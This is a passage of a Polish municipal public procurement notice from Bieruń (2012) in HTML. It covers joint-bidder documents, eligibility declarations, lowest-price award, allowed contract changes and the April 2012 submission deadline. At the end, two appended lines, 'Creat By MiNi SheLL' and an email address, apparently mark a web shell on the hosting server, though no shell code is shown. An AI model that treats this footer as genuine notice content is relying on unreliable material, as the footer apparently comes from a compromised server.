  c) Dokumenty wymienione w pkt. V B ppkt. 1 i 2 Listy wymaganych dokumentów, powinny być złożony w taki sposób, aby warunki o których mowa w pkt. IV SIWZ, wykonawcy występujący wspólnie spełnili łącznie. 
  d)  Dokumenty wymienione w pkt. V B ppkt. 3 i 4 Listy wymaganych dokumentów składa każdy                           z wykonawców wchodzących w skład podmiotu występującego wspólnie. 
     e) Kopie dokumentów dotyczących wykonawcy powinny być poświadczane za zgodność                z oryginałem przez wykonawcę, którego dokument dotyczy lub przez lidera lub przez wszystkich wykonawców wchodzących w skład tego podmiotu.
Wykonawca przystępujący do postępowania złoży następujące oświadczenie z art. 22 ust. 1 ustawy pzp, że:
1.	posiada uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;
2.	posiada wiedzę i doświadczenie potrzebną do wykonania zamówienia; 
3.	dysponuje odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia;
4.	znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie     zamówienia.
 Wszystkie oświadczenia muszą być złożone w oryginale i podpisane przez osobę (osoby) uprawnione do zaciągania zobowiązań w imieniu wykonawcy. 
Jeżeli wykonawca reprezentowany jest w postępowaniu przez pełnomocnika do oferty należy załączyć  pełnomocnictwo, w formie oryginału lub notarialnie poświadczonej kopii. 
Do oferty zaleca się załączyć informacje w zakresie:
       1) Części zamówienia, która zostanie powierzona podwykonawcom. W przypadku braku złożenia  informacji w tym zakresie, zamawiający uzna, że wykonawca wykona całość zamówienia sam bez powierzenia części zamówienia podwykonawcom. 
2)	Sposobu reprezentacji podmiotów występujących wspólnie ( pełnomocnictwo) - 
w przypadku ich  udziału w postępowaniu.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza zmiany zawartej z wykonawcą umowy w zakresie:
a.	wartości umownej, w przypadku wprowadzenia zmian VAT, który będzie naliczany zgodnie  z obowiązującą stawką;
b.	zmiany osób, które będą uczestniczyć w wykonywaniu przedmiotu umowy                       z zachowaniem wymagań określonych  w SIWZ, jakie osoby te powinny spełniać;
c.	terminu realizacji, w szczególności spowodowane: 
      absencją chorobową, zmianą przepisów, przedłużającymi się procedurami 
      administracyjnymi, związanymi  z uzyskaniem koniecznych uzgodnień, opinii, decyzji
      i pozwoleń;
d.	mającym wpływ na realizację przedmiotu umowy, w przypadku gdy nastąpi zmiana powszechnie obowiązujących przepisów prawa; 
e.	innych zmian, w przypadku gdy konieczność ich wprowadzenia będzie następstwem zmian lub wytycznych instytucji  uzgadniających dokumentację;
f.	innych zmian, których nie można było przewidzieć na etapie sporządzania SIWZ,                      a które nie wykraczają poza zakres art. 140 ustawy pzp.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bierun.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Bieruniu - Referat Zamówień Publicznych
43-150 Bieruń, ul. Rynek 14.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 11.04.2012 godzina 12:00, miejsce: Urząd Miejski w Bieruniu - sekretariat (I piętro - segment A, pokój nr 9)
43-150 Bieruń, ul. Rynek 14.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com